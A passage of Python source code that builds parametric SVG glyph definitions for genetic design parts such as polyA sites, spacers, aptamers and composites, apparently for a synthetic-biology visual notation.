params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
params['height'] = 5
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('3\' Overhang Site', 'SO:0001933', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'overhang_site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
overhang_scar_path1 = {}
overhang_scar_path1['class'] = 'unfilled-path'
overhang_scar_path1['id'] = 'overhang_site-path1'
overhang_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
overhang_scar_path1['d'] = eval_parameterised_path(overhang_scar_path1['parametric:d'], params)
overhang_scar_path1['style'] = style_text['unfilled-path']
glyph_paths.append(overhang_scar_path1)
overhang_scar_path2 = {}
overhang_scar_path2['class'] = 'unfilled-path'
overhang_scar_path2['id'] = 'overhang_site-path1'
overhang_scar_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width-(width*0.4)},{(baseline_y-baseline_offset)+(height*0.5)}'
overhang_scar_path2['d'] = eval_parameterised_path(overhang_scar_path2['parametric:d'], params)
overhang_scar_path2['style'] = style_text['unfilled-path']
glyph_paths.append(overhang_scar_path2)
return header_text, glyph_paths
def signature_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 20
params['height'] = 10
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Signature', 'SO:0001978', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-height-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
signature_path1 = {}
signature_path1['class'] = 'filled-path'
signature_path1['id'] = 'signature-box-path'
signature_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-height} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-height} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
signature_path1['d'] = eval_parameterised_path(signature_path1['parametric:d'], params)
signature_path1['style'] = style_text['filled-path']
glyph_paths.append(signature_path1)
signature_path2 = {}
signature_path2['class'] = 'unfilled-path'
signature_path2['id'] = 'signature-cross-path1'
signature_path2['parametric:d'] = 'M{baseline_x+pad_before+(height*0.3)},{(baseline_y-baseline_offset)-height+(height*0.3)} L{baseline_x+pad_before+(height*0.7)},{(baseline_y-baseline_offset)-height+(height*0.7)}'
signature_path2['d'] = eval_parameterised_path(signature_path2['parametric:d'], params)
signature_path2['style'] = style_text['unfilled-path']
glyph_paths.append(signature_path2)
signature_path3 = {}
signature_path3['class'] = 'unfilled-path'
signature_path3['id'] = 'signature-cross-path2'
signature_path3['parametric:d'] = 'M{baseline_x+pad_before+(height*0.3)},{(baseline_y-baseline_offset)-(height*0.3)} L{baseline_x+pad_before+(height*0.7)},{(baseline_y-baseline_offset)-(height*0.7)}'
signature_path3['d'] = eval_parameterised_path(signature_path3['parametric:d'], params)
signature_path3['style'] = style_text['unfilled-path']
glyph_paths.append(signature_path3)
signature_path4 = {}
signature_path4['class'] = 'unfilled-path'
signature_path4['id'] = 'signature-line-path'
signature_path4['parametric:d'] = 'M{baseline_x+pad_before+height},{(baseline_y-baseline_offset)-(height*0.3)} L{baseline_x+pad_before+width-(height*0.3)},{(baseline_y-baseline_offset)-(height*0.3)}'
signature_path4['d'] = eval_parameterised_path(signature_path4['parametric:d'], params)
signature_path4['style'] = style_text['unfilled-path']
glyph_paths.append(signature_path4)
return header_text, glyph_paths
def poly_a_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 20
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('PolyA Site', 'SO:0000553', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.3)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+(width*0.3)+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'poly-a-site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(width*0.3)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.3)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.3)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
polu_a_site_path1 = {}
polu_a_site_path1['class'] = 'unfilled-path'
polu_a_site_path1['id'] = 'poly-a-site-path1'
polu_a_site_path1['parametric:d'] = 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(1.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.333333)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(3.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.66666)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(5.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*1.0)},{(baseline_y-baseline_offset)}'
polu_a_site_path1['d'] = eval_parameterised_path(polu_a_site_path1['parametric:d'], params)
polu_a_site_path1['style'] = style_text['unfilled-path']
glyph_paths.append(polu_a_site_path1)
polu_a_site_path2 = {}
polu_a_site_path2['class'] = 'unfilled-path'
polu_a_site_path2['id'] = 'poly-a-site-path2'
polu_a_site_path2['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(0.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(3.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
polu_a_site_path2['d'] = eval_parameterised_path(polu_a_site_path2['parametric:d'], params)
polu_a_site_path2['style'] = style_text['unfilled-path']
glyph_paths.append(polu_a_site_path2)
polu_a_site_path3 = {}
polu_a_site_path3['class'] = 'unfilled-path'
polu_a_site_path3['id'] = 'poly-a-site-path3'
polu_a_site_path3['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(4.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(7.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
polu_a_site_path3['d'] = eval_parameterised_path(polu_a_site_path3['parametric:d'], params)
polu_a_site_path3['style'] = style_text['unfilled-path']
glyph_paths.append(polu_a_site_path3)
polu_a_site_path4 = {}
polu_a_site_path4['class'] = 'unfilled-path'
polu_a_site_path4['id'] = 'poly-a-site-path3'
polu_a_site_path4['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(8.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(11.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
polu_a_site_path4['d'] = eval_parameterised_path(polu_a_site_path4['parametric:d'], params)
polu_a_site_path4['style'] = style_text['unfilled-path']
glyph_paths.append(polu_a_site_path4)
return header_text, glyph_paths
def dna_location_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['top_width'] = 6
params['stem_height'] = 10
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('DNA Location', 'SO:0001236,SO:0000699', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
location_top_path = {}
location_top_path['class'] = 'filled-path'
location_top_path['id'] = 'location-top-path'
location_top_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))-(top_width/1.5)} {baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))-(top_width/1.5)} {baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} C{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))+(top_width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))+(top_width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} Z'
location_top_path['d'] = eval_parameterised_path(location_top_path['parametric:d'], params)
location_top_path['style'] = style_text['filled-path']
glyph_paths.append(location_top_path)
location_stem_path = {}
location_stem_path['class'] = 'unfilled-path'
location_stem_path['id'] = 'location-stem-path'
location_stem_path['parametric:d'] = 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height}'
location_stem_path['d'] = eval_parameterised_path(location_stem_path['parametric:d'], params)
location_stem_path['style'] = style_text['unfilled-path']
glyph_paths.append(location_stem_path)
return header_text, glyph_paths
def dna_cleavage_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['top_width'] = 6
params['stem_height'] = 10
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('DNA Cleavage Site', 'SO:0001688,SO:0001687', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
location_top_path1 = {}
location_top_path1['class'] = 'unfilled-path'
location_top_path1['id'] = 'location-top-path'
location_top_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height}'
location_top_path1['d'] = eval_parameterised_path(location_top_path1['parametric:d'], params)
location_top_path1['style'] = style_text['unfilled-path']
glyph_paths.append(location_top_path1)
location_top_path2 = {}
location_top_path2['class'] = 'unfilled-path'
location_top_path2['id'] = 'location-top-path'
location_top_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-top_width}'
location_top_path2['d'] = eval_parameterised_path(location_top_path2['parametric:d'], params)
location_top_path2['style'] = style_text['unfilled-path']
glyph_paths.append(location_top_path2)
location_stem_path = {}
location_stem_path['class'] = 'unfilled-path'
location_stem_path['id'] = 'location-stem-path'
location_stem_path['parametric:d'] = 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height-(top_width*0.5)}'
location_stem_path['d'] = eval_parameterised_path(location_stem_path['parametric:d'], params)
location_stem_path['style'] = style_text['unfilled-path']
glyph_paths.append(location_stem_path)
return header_text, glyph_paths
def dna_stability_element_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['top_width'] = 6
params['stem_height'] = 10
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('DNA Cleavage Site', 'SO:0001688,SO:0001687', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
location_top_path = {}
location_top_path['class'] = 'filled-path'
location_top_path['id'] = 'location-top-path'
location_top_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-(top_width*0.3)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height} L{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-(top_width*0.3) } Z'
location_top_path['d'] = eval_parameterised_path(location_top_path['parametric:d'], params)
location_top_path['style'] = style_text['filled-path']
glyph_paths.append(location_top_path)
location_stem_path = {}
location_stem_path['class'] = 'unfilled-path'
location_stem_path['id'] = 'location-stem-path'
location_stem_path['parametric:d'] = 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height}'
location_stem_path['d'] = eval_parameterised_path(location_stem_path['parametric:d'], params)
location_stem_path['style'] = style_text['unfilled-path']
glyph_paths.append(location_stem_path)
return header_text, glyph_paths
def spacer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 10
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Spacer', 'SO:0000031', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
spacer_path1 = {}
spacer_path1['class'] = 'filled-path'
spacer_path1['id'] = 'spacer-circle-path'
spacer_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
spacer_path1['d'] = eval_parameterised_path(spacer_path1['parametric:d'], params)
spacer_path1['style'] = style_text['filled-path']
glyph_paths.append(spacer_path1)
# Calculate the angles using basic trig
angle = 40.0
sin_angle = str(math.sin(angle))
cos_angle = str(math.cos(angle))
spacer_path2 = {}
spacer_path2['class'] = 'unfilled-path'
spacer_path2['id'] = 'spacer-cross1-path'
spacer_path2['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.5)-((width*0.5)*' + cos_angle +'))},{(baseline_y-baseline_offset)-((width*0.5)*' + sin_angle +')} L{(baseline_x+pad_before)+(width*0.5)+((width*0.5)*' + cos_angle +')},{(baseline_y-baseline_offset)+((width*0.5)*' + sin_angle +')}'
spacer_path2['d'] = eval_parameterised_path(spacer_path2['parametric:d'], params)
spacer_path2['style'] = style_text['unfilled-path']
glyph_paths.append(spacer_path2)
spacer_path3 = {}
spacer_path3['class'] = 'unfilled-path'
spacer_path3['id'] = 'spacer-cross2-path'
spacer_path3['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.5)-((width*0.5)*' + cos_angle +'))},{(baseline_y-baseline_offset)+((width*0.5)*' + sin_angle +')} L{(baseline_x+pad_before)+(width*0.5)+((width*0.5)*' + cos_angle +')},{(baseline_y-baseline_offset)-((width*0.5)*' + sin_angle +')}'
spacer_path3['d'] = eval_parameterised_path(spacer_path3['parametric:d'], params)
spacer_path3['style'] = style_text['unfilled-path']
glyph_paths.append(spacer_path3)
return header_text, glyph_paths
def aptamer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 18
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Aptamer', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-width-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
aptamer_path = {}
aptamer_path['class'] = 'filled-path'
aptamer_path['id'] = 'aptamer-path'
aptamer_path['parametric:d'] = 'M{(baseline_x+pad_before)+(width*0.35)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.3)} C{(baseline_x+pad_before)+(width*0.0)},{(baseline_y-baseline_offset)-(width*0.4)} {(baseline_x+pad_before)+(width*0.3)},{(baseline_y-baseline_offset)-(width*0.9)} {(baseline_x+pad_before)+(width*0.55)},{(baseline_y-baseline_offset)-(width*0.65)} L{(baseline_x+pad_before)+(width*0.75)},{(baseline_y-baseline_offset)-(width*0.8)} C{(baseline_x+pad_before)+(width*0.72)},{(baseline_y-baseline_offset)-(width*0.95)} {(baseline_x+pad_before)+(width*0.9)},{(baseline_y-baseline_offset)-(width*1.0)} {(baseline_x+pad_before)+(width*0.97)},{(baseline_y-baseline_offset)-(width*0.92)} C{(baseline_x+pad_before)+(width*1.05)},{(baseline_y-baseline_offset)-(width*0.72)} {(baseline_x+pad_before)+(width*0.9)},{(baseline_y-baseline_offset)-(width*0.7)} {(baseline_x+pad_before)+(width*0.82)},{(baseline_y-baseline_offset)-(width*0.68)} L{(baseline_x+pad_before)+(width*0.6)},{(baseline_y-baseline_offset)-(width*0.5)} C{(baseline_x+pad_before)+(width*0.63)},{(baseline_y-baseline_offset)-(width*0.37)} {(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)-(width*0.35)} {(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)} Z'
aptamer_path['d'] = eval_parameterised_path(aptamer_path['parametric:d'], params)
aptamer_path['style'] = style_text['filled-path']
glyph_paths.append(aptamer_path)
return header_text, glyph_paths
def non_coding_rna_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['height'] = 12
params['width'] = 20
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Non-coding RNA', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-height-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
non_coding_rna_path = {}
non_coding_rna_path['class'] = 'filled-path'
non_coding_rna_path['id'] = 'non-coding-rna-path'
non_coding_rna_path['parametric:d'] = 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*0.18)},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(5.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*(0.15+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*(0.18+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(10.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*(0.15+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*(0.18+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(15.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)} Z'
non_coding_rna_path['d'] = eval_parameterised_path(non_coding_rna_path['parametric:d'], params)
non_coding_rna_path['style'] = style_text['filled-path']
glyph_paths.append(non_coding_rna_path)
return header_text, glyph_paths
def nucleic_acid_one_strand_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['height'] = 12
params['width'] = 20
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Nucleic Acid 1 Strand', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
nucleic_path = {}
nucleic_path['class'] = 'unfilled-path'
nucleic_path['id'] = 'nucleic-acid-path'
nucleic_path['parametric:d'] = 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*0.18)},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(5.0/15.0))},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*(0.15+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*(0.18+(5.0/15.0)))},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(10.0/15.0))},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*(0.15+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*(0.18+(10.0/15.0)))},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(15.0/15.0))},{(baseline_y-baseline_offset)}'
nucleic_path['d'] = eval_parameterised_path(nucleic_path['parametric:d'], params)
nucleic_path['style'] = style_text['unfilled-path']
glyph_paths.append(nucleic_path)
return header_text, glyph_paths
def composite_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['height'] = 12
params['width'] = 40
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Composite', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'composite-background'
bg_path['parametric:d'] = 'M{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-pad_top} L{(baseline_x+pad_before)+width-(width*0.15)},{(baseline_y-baseline_offset)-pad_top} L{(baseline_x+pad_before)+width-(width*0.15)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)},{(baseline_y-baseline_offset)+height} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
composite_path1 = {}
composite_path1['class'] = 'unfilled-path'
composite_path1['id'] = 'composite-path'
composite_path1['parametric:d'] = 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.37)},{(baseline_y-baseline_offset)+height}'
composite_path1['d'] = eval_parameterised_path(composite_path1['parametric:d'], params)
composite_path1['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path1)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+width-(width*0.37)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)+height}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.15)*(10.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(10.0/10.0))} L{(baseline_x+pad_before)+((width*0.15)*(8.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(8.0/10.0))}'
composite_path2['d'] = eval_parameterised_path(composite_path2['parametric:d'], params)
composite_path2['style'] = style_text['unfilled-path']
glyph_paths.append(composite_path2)
composite_path2 = {}
composite_path2['class'] = 'unfilled-path'
composite_path2['id'] = 'composite-path'
composite_path2['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.15)*(6.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(6.0/10.0))} L{(baseline_x+pad_before)+((width*0.15)*(4.0/10.0))},{(baseline_y-baseline_offset)+height-(height*(4.0/10.0))}'
